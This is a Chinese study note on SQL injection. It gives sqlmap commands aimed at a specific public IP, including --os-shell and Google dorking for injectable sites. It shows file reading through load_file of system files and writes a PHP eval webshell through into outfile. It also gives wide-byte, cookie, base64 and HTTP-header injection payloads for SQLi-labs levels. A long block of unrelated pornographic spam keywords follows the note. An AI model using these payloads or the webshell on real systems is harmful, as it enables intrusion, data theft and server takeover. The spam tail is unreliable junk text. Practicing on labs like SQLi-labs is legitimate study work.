是否有報(bào)錯(cuò)????????????????? 報(bào)錯(cuò)注入

是否有布爾類型狀態(tài)??? 布爾盲注(既沒(méi)有回顯也沒(méi)有報(bào)錯(cuò))

絕招????????????????????????????? 延時(shí)注入

sqlmap(自動(dòng)化注入神器)

sqlmap -h可以看參數(shù)

測(cè)試

參數(shù)1、-u 后加url 檢測(cè)注入點(diǎn)

?python2 sqlmap.py -u "http://42.192.43.56/cms/show.php?id=33"

2、--dbs? 列出所有數(shù)據(jù)庫(kù)的名字

python2 sqlmap.py -u "http://42.192.43.56/cms/show.php?id=33"? --dbs

3、--current-db? 列出當(dāng)前數(shù)據(jù)庫(kù)的名字

python2 sqlmap.py -u "http://42.192.43.56/cms/show.php?id=33"? --current-db

4、-D? 指定一個(gè)數(shù)據(jù)庫(kù)

5、--tables? 列出表名

python2 sqlmap.py -u "http://42.192.43.56/cms/show.php?id=33" -D "cms" --tables

6、-T 指定表名

7、--columns? 列出所有的字段名

8、-C? 指定字段

9、--dump? 列出字段內(nèi)容

有些地方sqlmap是弄不出來(lái)的,只能手動(dòng)注入

get注入

-u "url"

檢測(cè)注入點(diǎn)

--dbs

列出所有數(shù)據(jù)庫(kù)的名字

--current-db

列出當(dāng)前數(shù)據(jù)的名

-D

指定一個(gè)數(shù)據(jù)庫(kù)

--tables

列出表名

-T

指定表名

--columns

列出所有字段名

-C

指定字段

--dump

列出字段內(nèi)容

?

post注入

打開cms用戶登錄界面,burp抓個(gè)包,保存到post.txt

-r post.txt

從文件中讀入http請(qǐng)求

--os-shell

獲取shell

sqlmap -g "inurl:php?id="

利用google 自動(dòng)搜索注入點(diǎn)

sqlmap -r post.txt?? 自動(dòng)讀取我們http數(shù)據(jù)報(bào)做注入測(cè)試

?

攜帶cookie 的認(rèn)證

要測(cè)試的頁(yè)面只有在登錄狀態(tài)下才能訪問(wèn),登錄狀態(tài)用cookie識(shí)別

--cookie ""


?

SQL 注入文件讀寫

讀寫文件
* 前提條件??? ?
??? 我們也可以利用SQL 注入漏洞讀寫文件。但是讀寫文件需要一定的條件。
??? 1. secure-file-priv(是mysql數(shù)據(jù)庫(kù)中的一個(gè)選項(xiàng),可以在phpmyadmin中看到該變量)
??? 可以在phpmyadmin 中看到該變量。(phpmyadmin---變量---secure-file-priv)

??? 該參數(shù)在高版本的mysql 數(shù)據(jù)庫(kù)中限制了文件的導(dǎo)入導(dǎo)出操作。改參數(shù)可以寫在my.ini 配置文件中[mysqld] 下。若要配置此參數(shù),需要修改my.ini 配置文件,并重啟mysql 服務(wù)。

?
??? 關(guān)于該參數(shù)值的相關(guān)說(shuō)明

secure-file-priv 參數(shù)配置?? ??? ?含義
secure-file-priv=?? ??? ??? ??? ???? 不對(duì)mysqld的導(dǎo)入導(dǎo)出操作做限制
secure-file-priv='c:/a/'?? ??? ? ?? 限制mysqld 的導(dǎo)入導(dǎo)出操作發(fā)生在c:/a/ 下(子目錄有效)?? ??? ??? ??? ??? ??? ??? ????
secure-file-priv=null?? ??? ??? ?限制mysqld 不允許導(dǎo)入導(dǎo)出操作

打開my.ini, 在[mysqld]下寫:寫完后保存重啟

mysql的導(dǎo)入導(dǎo)出操作(導(dǎo)入就是寫文件,導(dǎo)出就是讀取文件)
?
??? 2. 當(dāng)前用戶具有文件權(quán)限

?查詢語(yǔ)句[select File_priv from mysql.user where user="root" and host="localhost"]


? 3. 知道要寫入目標(biāo)文件的絕對(duì)路徑
?
* 讀取文件操作(load_flie(要讀取文件的路徑))

??? [?id=-1' union select 1, load_file('C:\\Windows\\System32\\drivers\\etc\\hosts'), 3 --+ ](假設(shè)我們讀取C:\Windows\System32\drivers\etc\hosts)
?? ?load_file('')
?? ?C:\\Windows\\System32\\drivers\\etc\\hosts(寫法1)
?? ?C:/Windows/System32/drivers/etc/hosts(寫法2,用左斜線)
linux系統(tǒng)當(dāng)中我們路徑用做斜線來(lái)分隔,windows系統(tǒng)中我們用右斜線來(lái)分隔,但是右斜線會(huì)作為轉(zhuǎn)移字符出現(xiàn)
上面兩種寫法選哪一種都可以

?? 應(yīng)用:打開http://42.192.43.56/cms/show.php?id=33

打開hacker bar---load URL后split URL
打開SQL---Union---union select statement---輸入15

??

id=-33 發(fā)現(xiàn)11這個(gè)位置有選項(xiàng),我們直接http://42.192.43.56/cms/show.php?id=-33 UNION SELECT 1,2, load_file('C:\\Windows\\System32\\drivers\\etc\\hosts'),4,5,6,7,8,9,10,11,12,13,14,15


* 寫入文件操作(into outfile)

??? [?id=1' and 1=2 union select 1,'<?php @eval($_REQUEST[777]);?>',3 into outfile 'c:\\phpstudy\\www\\2.php'--+],直接傳入?yún)?shù),頁(yè)面如果不報(bào)錯(cuò),說(shuō)明寫入成功。可以直接訪問(wèn)寫入的文件[http://localhost/1.php]

?? ?into outfile

可以寫入一句話木馬或者是phpinfo()

?

寬字節(jié)注入

??? 寬字節(jié)注入準(zhǔn)確來(lái)說(shuō)不是注入手法,而是另外一種比較特殊的情況。為了說(shuō)明寬字節(jié)注入問(wèn)題,我們以SQLi-labs 32 關(guān)為例子。

??? 使用[?id=1']進(jìn)行測(cè)試的時(shí)候,發(fā)現(xiàn)提交的單引號(hào)會(huì)被轉(zhuǎn)移[\']。此時(shí),轉(zhuǎn)義后的單引號(hào)不再是字符串的標(biāo)識(shí),會(huì)被作為普通字符帶入數(shù)據(jù)庫(kù)查詢。也就是說(shuō),我們提交的單引號(hào)不會(huì)影響到原來(lái)SQL 語(yǔ)句的結(jié)構(gòu)。
?
??? 我們通過(guò)閱讀32 關(guān)的源碼,發(fā)現(xiàn)幾句非常意思的代碼,如下。

??? 此網(wǎng)頁(yè)在連接數(shù)據(jù)庫(kù)時(shí),會(huì)將字符編碼設(shè)置為GBK 編碼集合,然后進(jìn)行SQL 語(yǔ)句拼接,最后進(jìn)行數(shù)據(jù)庫(kù)查詢。
??? GBK編碼依然采用雙字節(jié)編碼方案,其編碼范圍:8140-FEFE,剔除xx7F碼位,共23940個(gè)碼位。共收錄漢字和圖形符號(hào)21886個(gè),其中漢字(包括部首和構(gòu)件)21003個(gè),圖形符號(hào)883個(gè)。GBK編碼支持國(guó)際標(biāo)準(zhǔn)ISO/IEC10646-1和國(guó)家標(biāo)準(zhǔn)GB13000-1中的全部中日韓漢字,并包含了BIG5編碼中的所有漢字。GBK編碼方案于1995年12月15日正式發(fā)布,這一版的GBK規(guī)范為1.0版。
??? 轉(zhuǎn)移字符[\] 的編碼是5c,正好在GBK 編碼范圍之內(nèi),也就是說(shuō)我們可以在單引號(hào)之前提交一個(gè)十六進(jìn)制編碼的字符,與5c 組成一個(gè)GBK 編碼的漢字。這樣SQL 語(yǔ)句傳入數(shù)據(jù)庫(kù)的時(shí)候,轉(zhuǎn)移字符5c ,會(huì)被看作GBK 漢字的低位字節(jié)編碼,從而失去轉(zhuǎn)義的作用。

??? 如果我們提交這樣的參數(shù)[?id=1000%df' union select 1,2,3 --+],就可以使用聯(lián)合查詢進(jìn)行注入了。
??? (轉(zhuǎn)移失效了,單引號(hào)會(huì)作為控制字符出現(xiàn))
??? 0xdf5c 就是一個(gè)漢字"運(yùn)"。(右斜線是5c)

先試一下id=1,id=2? ——》頁(yè)面不一樣(可以采用聯(lián)合查詢)
判斷注入點(diǎn)的時(shí)候添加一個(gè)單引號(hào)

再用雙引號(hào)試試看,發(fā)現(xiàn)不管是單引號(hào)還是雙引號(hào)都會(huì)被轉(zhuǎn)義

我們要想辦法讓轉(zhuǎn)義失效,我們可以提交[?id=1000%df' union select 1,2,3 --+],

如果我們?id=1%df'

我們--+看看(沒(méi)報(bào)錯(cuò)):由于這個(gè)地方手動(dòng)添加了一個(gè)單引號(hào),我們--+就要注釋原來(lái)SQL語(yǔ)句中的引號(hào),達(dá)到閉合狀態(tài)
現(xiàn)在就可以判斷列數(shù)...

我們想讓1,2,3顯示到頁(yè)面中來(lái),我們就用 and 1=2,或者id=-1,得知2,3是回顯位

寬字節(jié)注入就是由于我們程序在編譯時(shí)設(shè)置了set name gbk,把編碼格式設(shè)置為GBK,并且我們提交的數(shù)據(jù)會(huì)有一個(gè)右斜線的單引號(hào)的轉(zhuǎn)義
這時(shí)候提交%df,就可以去“吃掉”轉(zhuǎn)義字符,使我們單引號(hào)生效,達(dá)到注入的目的

?

Cookie 注入

??? 我們使用SQLi-labs 第20 關(guān)來(lái)說(shuō)明Cookie 注入問(wèn)題。
??? Cookie 注入的注入?yún)?shù)需要通過(guò)Cookie 提交,可以通過(guò)[document.cookie] 在控制臺(tái)完成對(duì)瀏覽器Cookie 的讀寫。
??? 來(lái)到less-20,在控制臺(tái)輸入
??? [document.cookie="uname=Dumb' and extractvalue(1,concat(0x7e,database(),0x7e))#"]
??? 刷新頁(yè)面即可。

我們進(jìn)行cookie注入的時(shí)候用burpsuite比較好
先掛個(gè)代理

打開burp


?然后我們輸入
username:Dumb
password:Dumb

抓個(gè)包

我們分析一下登錄之前和登錄之后有什么區(qū)別(在repeater模塊中右鍵發(fā)送到comparer模塊,兩個(gè)都發(fā))【登錄前后都抓個(gè)包】

base64 注入

base64不是加密方式,是一種編碼方式

??? 我們以SQLI-labs 第22關(guān)來(lái)說(shuō)明base64 注入的問(wèn)題。
??? base64 注入也是比較簡(jiǎn)單的,只不過(guò)將注入字段經(jīng)過(guò)base64 編碼。經(jīng)過(guò)測(cè)試,發(fā)現(xiàn)22 關(guān)屬于Cookie 型的base64 注入。我們可以使用報(bào)錯(cuò)注入手法,payload
??? [document.cookie="uname=Dumb" and extractvalue(1,concat(0x7e,database(),0x7e))#"]
??? 在控制臺(tái)輸入???????
[document.cookie="uname=RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCksMHg3ZSkpIw=="]。
??? 刷新瀏覽器網(wǎng)頁(yè)即可。

?

HTTP 頭部注入

??? http 頭部注入就是指注入字段在HTTP 頭部的字段中,這些字段通常有User-Agent、Referer 等。
* User-Agent 注入
??? 如SQLi-labs 第18 關(guān)。
??? payload
??? [User-Agent:hacker' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1]?


?
* Referer 注入?? ?
??? 第19 關(guān),注入字段在Referer 中
??? [hacker' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1]

?

?

?

?

總結(jié)

以上是生活随笔為你收集整理的【CyberSecurityLearning 55】SQL注入的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

成年美女黄网站色大片免费看 | 五月开心六月婷婷 | 在线观看免费国产小视频 | 亚洲va在线va天堂va偷拍 | 国产精品午夜8888 | 国内精品福利视频 | 日韩伦理一区二区三区av在线 | 免费看国产视频 | 九九热久久免费视频 | 成人黄色影片在线 | 五月婷婷丁香网 | 国产精品福利午夜在线观看 | 99资源网| 日韩精品一卡 | 特片网久久 | 激情欧美一区二区免费视频 | 久艹视频免费观看 | 麻豆传媒视频观看 | 美女黄视频免费看 | 久久精品一区二区三区视频 | 福利久久久 | 在线观看日韩av | 国产精品嫩草影院9 | 国产精品一区二区三区久久久 | 五月亚洲婷婷 | 一区 在线 影院 | 久草在线资源观看 | 久草男人天堂 | 亚洲乱码一区 | zzijzzij亚洲成熟少妇 | 午夜久久福利影院 | 国产精品资源在线观看 | 97国产超碰在线 | 欧美孕妇与黑人孕交 | 欧美精品v国产精品 | 中文字幕免费国产精品 | 欧美午夜视频在线 | 一区二区三区www | 成人网页在线免费观看 | 午夜三级福利 | 午夜精品视频在线 | 久久精品视频在线观看 | 国产精品刺激对白麻豆99 | 国产成人精品在线 | 狠狠色伊人亚洲综合网站色 | 国产特黄色片 | 日本h视频在线观看 | 人人射人人射 | 涩涩在线 | 99re6热在线精品视频 | 免费在线91 | 亚洲经典视频在线观看 | 亚洲成人av电影 | 国产黄色看片 | 四虎成人精品永久免费av九九 | 91人人揉日日捏人人看 | 97成人免费视频 | 久久久久久久久久久影院 | 天天操网| 国产对白av | 国产麻豆视频免费观看 | 天天人人 | av爱干| 国产不卡免费视频 | 亚洲国产精品久久久久久 | 日本在线免费看 | 色婷婷综合久久久中文字幕 | 国产精品com | 欧美91视频| 久久久久 | 日韩欧美一区二区不卡 | 中文字幕色网站 | 欧美性一级观看 | 国产精品成人久久 | www黄色av | 在线观看午夜av | 91精品日韩 | 久久免费公开视频 | 日韩三级在线观看 | 91激情视频在线播放 | 婷婷激情5月天 | 超碰97久久| 久久午夜电影网 | 91干干干 | 人人超碰97| 911久久| 999久久久久久 | 久久久久 免费视频 | 麻豆传媒视频观看 | 精品久久福利 | 亚洲视频1区2区 | 免费国产在线精品 | 成人在线免费观看视视频 | 色综合天天综合 | 精品视频123区在线观看 | 国产中文字幕在线播放 | 国产精品入口久久 | 韩国av免费观看 | 主播av在线 | 午夜丰满寂寞少妇精品 | 综合中文字幕 | 丁香一区二区 | 美女av电影| 亚洲午夜av久久乱码 | 国产精品大片在线观看 | 日韩午夜电影院 | 免费久久99精品国产 | 一级成人免费 | 在线观看www91| 欧美性网站 | 丝袜美腿在线 | 99视频在线播放 | 在线观看深夜视频 | 婷婷激情在线观看 | 亚州国产精品 | 日本中文字幕在线看 | 色综合天天干 | 国产不卡一二三区 | 超碰人人草 | 久久精品网址 | 久草在线这里只有精品 | 六月丁香久久 | 69av视频在线观看 | 69视频网站 | 久久久免费精品视频 | 热久久国产精品 | 亚洲国产小视频在线观看 | 久久99九九99精品 | 在线观看麻豆av | 88av色| 97夜夜澡人人爽人人免费 | 中文字幕在线一区二区三区 | 91麻豆精品一区二区三区 | 98超碰在线观看 | 中文字幕日韩有码 | 成 人 黄 色 免费播放 | 四虎影视成人精品国库在线观看 | 日韩美av在线 | 亚洲国产日韩精品 | 亚洲精品久久久久中文字幕m男 | 久久夜靖品| 成人av电影免费在线观看 | 精品免费 | 久久一区二区三区国产精品 | 久久久久免费精品 | 亚洲精品国产视频 | 精品国产一区在线观看 | 久久dvd | 日操操| 999热线在线观看 | 免费网站看v片在线a | 午夜三级在线 | 黄色在线免费观看网址 | 日本精品视频在线观看 | 九九热免费视频在线观看 | 全黄网站 | 成人高清在线观看 | 国产啊v在线观看 | 麻豆视频国产在线观看 | 久久精品三级 | 天天干com| 一区二区三区在线视频111 | 国产美女精品视频免费观看 | 99久在线精品99re8热视频 | 国产一区二区精品91 | 在线免费观看视频 | 亚洲一区在线看 | 亚洲视频在线播放 | 在线a视频 | 欧美极品xxxx | 日本在线观看一区 | 日本狠狠色| av成人动漫在线观看 | 91av免费看 | 国产理论一区二区三区 | 男女精品久久 | 日韩久久久久久 | 国产精品久久一区二区三区不卡 | 国际精品久久 | 欧美另类视频 | 精品久久国产一区 | 在线观看91| 日韩电影在线看 | 天天干夜夜操视频 | 久久精品日产第一区二区三区乱码 | 亚洲国产精品成人女人久久 | 久久久久女人精品毛片 | 天天综合成人 | 天天爱天天干天天爽 | 婷婷激情综合网 | 日本久久久久久 | www.黄色片.com | 日韩中文字幕国产 | 草久视频在线观看 | 国产在线观看你懂得 | 日日爱av| 在线网址你懂得 | 亚洲高清视频在线观看 | 久久久久久久久久久久久久免费看 | 国产午夜精品福利视频 | 97超碰免费在线观看 | 成人欧美一区二区三区在线观看 | 日韩精品中文字幕在线观看 | www.成人久久 | 日韩视频免费在线 | 亚洲视频资源在线 | 嫩小bbbb摸bbb摸bbb | 日韩精品视频在线免费观看 | 色综合婷婷久久 | 精品久久久久久久久中文字幕 | 久久久久电影 | 日韩av网站在线播放 | 久久99国产精品久久 | 国产色视频网站 | 天天草综合网 | 欧美国产精品久久久久久免费 | 精品国产伦一区二区三区免费 | 在线观看国产麻豆 | 91在线免费看片 | 亚洲一级片免费观看 | av千婊在线免费观看 | 在线看污网站 | 国产黄色精品在线 | 狠狠狠狠狠色综合 | 五月天av在线 | aaa毛片视频 | 一级特黄aaa大片在线观看 | 欧美最新大片在线看 | 在线观看黄色小视频 | av大全在线播放 | 国产欧美日韩视频 | 丁香六月综合网 | 欧美一区日韩精品 | 婷婷丁香激情网 | 日韩两性视频 | 91激情视频在线观看 | 欧美日韩国产一区二区在线观看 | 黄网站大全 | 国产黄色av | 亚洲va欧美va| av中文在线影视 | 99综合视频 | 成人av资源站 | 亚洲成av人片在线观看香蕉 | 亚洲高清在线视频 | 日韩视频在线观看免费 | 蜜臀久久99静品久久久久久 | 91成人精品一区在线播放 | 92国产精品久久久久首页 | 成片免费| 在线观看a视频 | 91成人网在线播放 | 中文字幕在线观看三区 | 美女视频免费精品 | 国内外激情视频 | 日韩av区 | 日韩一二三区不卡 | 97免费中文视频在线观看 | 日日夜夜操操操操 | av在线免费网站 | 91中文字幕在线播放 | www.亚洲黄色 | 人人爽爽人人 | 国产又粗又猛又黄视频 | 国产中年夫妇高潮精品视频 | 久久国产精品影视 | 91人人爱| 色婷婷成人 | 国产精品一区二区久久久 | 中文在线www| 高清色免费 | 三级黄色片子 | 国产a级片免费观看 | 国产97在线观看 | 国产精品久久久精品 | 成年人视频在线观看免费 | 国产精品理论片 | 久久任你操 | 久久久精品免费观看 | 国内免费久久久久久久久久久 | 精品国产免费久久 | 精品视频久久 | 国产精品国产亚洲精品看不卡15 | 日本成址在线观看 | 久久久网页| 久久五月精品 | 午夜成人免费影院 | 久久爽久久爽久久av东京爽 | 欧美视频二区 | 日韩xxxbbb| 视频在线观看一区 | 韩国av三级 | 亚洲视频观看 | 蜜臀久久99精品久久久酒店新书 | 在线看日韩| 日韩一区二区三区免费视频 | 国产精品第一页在线 | 久久久久综合 | 国产18精品乱码免费看 | 五月婷婷黄色 | 91精品啪啪| 99亚洲精品| 久久久久久综合 | 亚洲欧美日韩在线看 | 麻豆视频免费入口 | 久久精品久久久精品美女 | 视频成人永久免费视频 | 亚洲做受高潮欧美裸体 | 天天做天天爱天天爽综合网 | 黄污视频大全 | 黄色片网站免费 | 久久国产精品影视 | av电影在线播放 | 中文字幕日韩国产 | 欧美另类高清 videos | 欧美性做爰猛烈叫床潮 | 国产精品久久久久免费观看 | 精品国产aⅴ麻豆 | 天天躁日日 | 五月婷婷色 | 久久国产影院 | 午夜视频免费在线观看 | 日韩av一区在线观看 | 成人网大片 | 97精品国产一二三产区 | 国产精品成人自产拍在线观看 | 免费网址你懂的 | 成人久久国产 | 日韩理论在线 | 日本中文字幕网站 | 久久看毛片 | 尤物九九久久国产精品的分类 | 国产精品视频在线观看 | 久久免费视频观看 | 亚洲91精品在线观看 | 亚洲精品国产日韩 | 五月开心六月婷婷 | 成人久久国产 | 国产精品视频资源 | 成人免费毛片aaaaaa片 | 一区二区三区高清 | 午夜av片 | 一级片免费在线 | 久久精品网站视频 | 国产韩国日本高清视频 | 九九免费在线观看 | 在线观看国产日韩欧美 | 亚洲精品日韩一区二区电影 | 麻豆一二三精选视频 | 波多野结衣网址 | 午夜三级福利 | 国产午夜精品在线 | 久久久久久久久影院 | 日韩不卡高清视频 | 国产在线精品国自产拍影院 | 午夜久久久久久久久久影院 | 久精品一区 | 日韩精品在线免费观看 | 国产精品一区二区av麻豆 | 免费a一级 | 狠狠色丁香久久综合网 | 日韩欧美在线观看一区二区 | 国产r级在线观看 | 久久久久 免费视频 | 99视屏 | 91在线麻豆 | 国产成人一区二区三区久久精品 | 91九色精品国产 | 成人免费在线视频观看 | 99这里只有精品视频 | 一级黄色大片在线观看 | 久久久久久久久久电影 | 麻豆一区二区三区视频 | 丁香综合av| 国产成人三级在线播放 | 激情网站网址 | 成人日韩av | 国产高清专区 | www久久久| www.久久视频| 成人av片免费观看app下载 | 亚洲第五色综合网 | 国产精品999久久久 久产久精国产品 | 伊香蕉大综综综合久久啪 | 亚洲国产wwwccc36天堂 | 精品久久免费 | 久久久久久久久网站 | www国产亚洲精品久久麻豆 | 亚洲日本在线视频观看 | 中文字幕 影院 | 色偷偷888欧美精品久久久 | 亚洲一区二区天堂 | 欧美最猛性xxx | av免费福利 | 国产一级在线看 | 久久久亚洲麻豆日韩精品一区三区 | 在线免费高清视频 | 日韩激情视频 | 狠狠色丁婷婷日日 | 天天艹天天爽 | 国产福利不卡视频 | 成人丝袜 | 久久精品5 | 成人污视频在线观看 | 日韩三级.com | 亚洲伦理电影在线 | 久久久久国产精品午夜一区 | 激情欧美一区二区三区免费看 | 日本韩国欧美在线观看 | 午夜精品一区二区三区在线播放 | 在线91网| 中文字幕在线播放一区 | 91成人精品观看 | 久久久免费观看完整版 | 在线a人v观看视频 | 日韩字幕在线 | 免费看的视频 | 色婷婷综合久久久 | 中文字幕免费高清在线观看 | 欧美日韩一区二区视频在线观看 | 五月婷婷六月丁香在线观看 | 精品久久久久免费极品大片 | 久久久久北条麻妃免费看 | 91看国产| 国产综合视频在线观看 | 国产男女免费完整视频 | 国产精品福利无圣光在线一区 | 久久不射电影院 | 久久久久久久久久久精 | 精品乱码一区二区三四区 | 亚洲视频久久久 | 五月婷av | 911久久香蕉国产线看观看 | 久草在线综合 | 中文字幕乱码亚洲精品一区 | 午夜国产福利在线观看 | 欧美极品一区二区三区 | 九九影视理伦片 | 久久国产乱 | 成人av电影在线 | 天天综合天天做天天综合 | 日韩免费观看一区二区三区 | 久久久国产精品电影 | 久久精品96 | 色婷婷天天干 | 亚洲乱码中文字幕综合 | 久久免费的精品国产v∧ | 久99久中文字幕在线 | 色偷偷88欧美精品久久久 | 日韩成人精品一区二区 | 在线观看黄 | 久久久久久久久黄色 | 天天操天天射天天 | 亚洲午夜精品电影 | 国产一区二区视频在线播放 | 国产日本在线播放 | 国产色女人 | 国产精品黄色 | 日韩高清av | 麻豆91在线看 | 亚洲狠狠 | 成人动漫一区二区 | 亚洲精品999 | 97超级碰碰碰视频在线观看 | 国产香蕉视频在线观看 | 98福利在线 | 久久免费视频7 | 日韩中文字幕免费 | 91精品麻豆 | 日韩性xxxx| 五月激情六月丁香 | 久久久久久久久久久久久影院 | 久久久免费毛片 | 国产手机在线观看 | 激情喷水| 国产又黄又硬又爽 | 国产日产欧美在线观看 | 日本久久免费视频 | 亚洲欧美日韩国产一区二区三区 | 亚洲精品视频在线观看视频 | 中文在线免费一区三区 | 国产精品免费观看网站 | 在线 视频 一区二区 | 欧美日韩国产区 | 国产成人精品综合久久久久99 | www久草 | 久久久国产毛片 | 99久久精品日本一区二区免费 | 欧美国产在线看 | 精品一区二区三区四区在线 | 欧美综合国产 | 免费精品国产 | 久久精品国产美女 | 色播五月激情五月 | 国产精品18久久久久久vr | 国产精品免费在线播放 | 日韩欧美高清 | 亚洲网久久 | 天天插伊人 | 2022中文字幕在线观看 | 国产一级视屏 | 亚洲黄色在线观看 | 欧美一级日韩免费不卡 | 欧美另类z0zx | 精品在线亚洲视频 | 国产精品国产自产拍高清av | 天天射天| 日韩av在线一区二区 | 国产小视频在线免费观看 | 欧美-第1页-屁屁影院 | 成人高清在线 | 成人免费在线观看电影 | 麻豆视频在线免费 | 波多野结衣视频一区二区 | 久章操| 91亚洲精品乱码久久久久久蜜桃 | 日日爱999 | 亚洲人成人在线 | 最新的av网站 | 97超碰伊人 | 亚洲狠狠操| 国产黄色在线网站 | 日韩一区二区三区免费视频 | 国产专区在线播放 | 综合色婷婷| 天堂av在线免费观看 | 青草视频在线免费 | 久久www免费人成看片高清 | 成 人 黄 色 片 在线播放 | 黄色一级大片在线免费看产 | 免费日韩 | 国产精品永久久久久久久久久 | 久久久久国产精品免费网站 | 婷婷六月综合网 | 国产精品高潮久久av | 国产精品精品国产婷婷这里av | 香蕉在线观看 | 亚洲老妇xxxxxx| 国产精品女 | 99r在线播放 | 久久久国产精品视频 | 国产精品久久久久久久久久久久久 | 香蕉视频在线网站 | 伊人在线视频 | 亚洲欧美综合 | 久久污视频| 亚洲精品午夜国产va久久成人 | 成人aaa毛片 | 亚洲精品在线二区 | 欧美高清视频不卡网 | 天天色天天干天天色 | 黄色三级网站 | 免费看成人 | 国产午夜影院 | 欧美精品在线观看一区 | 三级av中文字幕 | 黄色成人av网址 | 午夜国产一区二区三区四区 | 五月天伊人 | 在线观看免费黄视频 | 久久色网站 | 亚洲精品五月 | 91漂亮少妇露脸在线播放 | 九九久久成人 | 欧美成a人片在线观看久 | 天天天操天天天干 | 91禁在线观看 | 一区二区观看 | 99色视频 | 欧美一区日韩一区 | 丁香视频免费观看 | 精品电影一区 | 黄网站免费大全入口 | 亚洲美女免费精品视频在线观看 | 久久精品一区二区国产 | 久久99精品波多结衣一区 | 香蕉视频91| 黄色小说免费在线观看 | 天天拍天天色 | 国产精品99久久久久久人免费 | 成年人视频在线 | 国产一级电影 | 欧美最新另类人妖 | 韩国精品视频在线观看 | 国产九色91 | 这里只有精品视频在线 | 日韩欧美一二三 | 毛片久久久 | 亚洲精品欧洲精品 | 三上悠亚在线免费 | 天堂中文在线视频 | 色视频在线 | 免费看一级黄色大全 | 亚洲免费在线观看视频 | 久久成人资源 | 久久精品老司机 | 午夜av不卡 | 中文字幕在线成人 | 一级免费黄色 | 国产剧情一区二区 | 伊人春色电影网 | 日韩免费成人 | 国产福利91精品一区二区三区 | 久久男人影院 | 亚洲美女免费精品视频在线观看 | 国产精选在线 | 激情视频国产 | 国产精品一区二区无线 | 久久99中文字幕 | 国产 欧美 在线 | 九九九九精品 | 国产九色91| 欧美激情另类文学 | 国产精品成人一区二区三区吃奶 | 亚州av成人 | 国产精品k频道 | 国产午夜不卡 | 欧美a影视 | 99re8这里有精品热视频免费 | 黄p在线播放 | 亚洲电影久久久 | 国产视频二区三区 | 久草在线视频免赞 | 欧美激情精品一区 | 91麻豆精品国产91久久久久久 | 伊人午夜视频 | 国产在线国产 | 精品国产乱码久久久久久浪潮 | 国产精品视频免费观看 | 最新中文字幕在线资源 | 97麻豆视频 | 成人黄大片| 久久精品2 | 天天玩夜夜操 | 久久久午夜影院 | 国产黄色大片 | 日日干天天干 | 日日草天天干 | 免费在线观看av网址 | 国内久久看 | 麻豆国产在线视频 | 在线 成人| 日韩激情视频在线 | 成人国产一区二区 | 日本成人中文字幕在线观看 | 日韩综合一区二区 | 国产又粗又硬又爽的视频 | 国产美女搞久久 | 国产一二区视频 | 亚洲经典精品 | 最新一区二区三区 | 在线观看黄av| 成人永久免费 | 天天爽夜夜爽人人爽曰av | 操处女逼| 精品999久久久| 99亚洲国产精品 | 国内小视频在线观看 | 免费www视频 | 99久久精品免费视频 | 久久免费国产视频 | 国产在线久草 | 亚洲电影自拍 | 中文字幕日韩免费视频 | 麻豆激情电影 | av电影在线观看完整版一区二区 | 久久超级碰 | 国产成人精品一区二三区 | 天天操天天干天天操天天干 | 91最新国产 | 99资源网 | 午夜av网站 | 欧美伦理电影一区二区 | 日韩有码在线播放 | 久久69精品久久久久久久电影好 | 黄污污网站 | 精品在线一区二区 | 婷婷在线免费观看 | 天天插天天干 | 99 视频 高清| 成人欧美一区二区三区在线观看 | 91女神的呻吟细腰翘臀美女 | 国产三级视频在线 | 成人a毛片| 人人搞人人爽 | 免费人做人爱www的视 | 中文在线字幕免费观 | 精品一区二区综合 | 国产女人18毛片水真多18精品 | 久久久久久久免费观看 | 日韩视频图片 | 99爱国产精品 | 免费观看www视频 | 免费日韩一区 | 人人网人人爽 | 美女在线观看网站 | 亚洲自拍偷拍色图 | 久久乱码卡一卡2卡三卡四 五月婷婷久 | 欧美一区二区三区在线看 | 日韩精品久久久久久中文字幕8 | 国产91精品高清一区二区三区 | 久久ww| 久久久久国产精品一区 | 一区二区不卡视频在线观看 | 国产99爱 | 亚洲a成人v| 久艹视频在线观看 | 尤物97国产精品久久精品国产 | 在线黄色观看 | 欧美91精品久久久久国产性生爱 | 狠狠躁夜夜a产精品视频 | 国产精品一区免费看8c0m | 波多野结衣精品 | 久久久福利| 天堂av网站 | av电影免费在线播放 | 国产麻豆精品在线观看 | 国产69精品久久99的直播节目 | 99久久精品国产一区二区三区 | 麻豆视频免费在线观看 | 久久国产电影院 | 天天干亚洲 | 精品久久久99 | 国产成人久久77777精品 | 成人久久精品 | 999国产在线 | 91亚色免费视频 | 欧美午夜理伦三级在线观看 | 久久激情网站 | 黄色一级大片在线观看 | 九九久久免费 | 中文字幕在线看人 | 一级做a爱片性色毛片www | 午夜色场 | 东方av在| 国产手机视频在线播放 | 国产精品激情在线观看 | 天天精品视频 | 免费网站黄 | 91av成人| 在线免费观看视频一区 | 久久精品久久久精品美女 | 免费在线观看污网站 | 又黄又爽又湿又无遮挡的在线视频 | 五月在线视频 | 四虎永久视频 | 在线观看免费一区 | 久久久99国产精品免费 | 最新色站| 色综合久久中文字幕综合网 | 久久综合精品国产一区二区三区 | 精品久久电影 | 欧美亚洲一级片 | 国产h在线播放 | 久久精品黄 | 中文字幕一区二区三区四区 | 亚洲国产剧情 | 天天综合网 天天综合色 | 成年人视频在线观看免费 | 久久久久久久久久久久影院 | 97超视频在线观看 | 国产一区二区免费看 | 亚洲天堂免费视频 | 免费看片网页 | 丝袜美腿在线视频 | 日本资源中文字幕在线 | 中文字幕黄色av | 很黄很黄的网站免费的 | 免费观看第二部31集 | 99国产精品久久久久久久久久 | 欧美日韩国产一区二区三区 | 亚洲国产视频网站 | 国产 日韩 中文字幕 | 成人网大片 | 国产成人av一区二区三区在线观看 | 欧美日韩免费观看一区=区三区 | 亚洲一级二级三级 | 免费美女av | 91av免费在线观看 | 国产精品免费在线播放 | 国产精品一区二区免费视频 | 美女视频a美女大全免费下载蜜臀 | 免费能看的av| 波多野结衣视频一区二区 | 久草综合视频 | 五月婷婷欧美 | 中文字幕在线专区 | 国产一区二区电影在线观看 | 中文字幕一区二区三区视频 | 婷婷亚洲激情 | 九九视频精品免费 | 国产一级在线看 | 精品一区二区免费 | 91视频免费看片 | 亚洲精品男人天堂 | 在线观看爱爱视频 | 国产精品美女久久久久久网站 | 